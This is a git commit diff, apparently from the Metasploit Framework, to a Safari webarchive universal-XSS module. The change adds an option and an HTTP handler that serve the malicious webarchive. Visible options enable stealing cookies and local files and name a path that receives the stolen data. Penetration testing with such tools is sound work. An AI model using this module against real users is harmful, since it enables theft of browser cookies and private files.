Add support for DOWNLOAD_URI option.

* Fixes some comments that were no longer accurate.

Conflicts:
	modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
unstable
Joe Vennix 2013-04-27 17:43:42 -05:00
parent 1d9a695d2b
commit 55e0ec3187
1 changed files with 28 additions and 6 deletions

View File

@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@ -153,6 +154,20 @@ class Metasploit3 < Msf::Auxiliary
@service_path = uopts['Path']
@http_service.add_resource(uopts['Path'], uopts)
# Add path to download
uopts = {
'Proc' => Proc.new { |cli, req|
resp = Rex::Proto::Http::Response::OK.new
resp['Content-Type'] = 'application/x-webarchive'
resp.body = @xml.to_s
cli.send_response resp
},
'Path' => webarchive_download_url
}.update(opts['Uri'] || {})
@http_service.add_resource(webarchive_download_url, uopts)
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
# As long as we have the http_service object, we will keep the ftp server alive
while @http_service
select(nil, nil, nil, 1)
@ -176,9 +191,10 @@ class Metasploit3 < Msf::Auxiliary
# @return [String] contents of webarchive as an XML document
def webarchive_xml
xml = webarchive_header
urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
xml << webarchive_footer
return @xml if not @xml.nil? # only compute xml once
@xml = webarchive_header
urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
@xml << webarchive_footer
end
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@ -288,8 +304,9 @@ class Metasploit3 < Msf::Auxiliary
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
def web_response_xml(script)
# this is a binary plist, but im too lazy to write a real encoder.
# ripped this straight out of a safari webarchive save.
# this is a serialized NSHTTPResponse, i'm too lazy to write a
# real encoder so yay lets use string interpolation.
# ripped this straight out of a webarchive save
script['content-length'] = script[:body].length
whitelist = %w(content-type content-length date etag
Last-Modified cache-control expires)
@ -711,7 +728,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
# @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
def find_cached_scripts
cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
begin
@ -780,6 +797,11 @@ class Metasploit3 < Msf::Auxiliary
"#{proto}://#{myhost}#{port_str}"
end
# @return [String] URL that serves the malicious webarchive
def webarchive_download_url
@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
end
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
# via the FILE_URLS module option.
def interesting_file_urls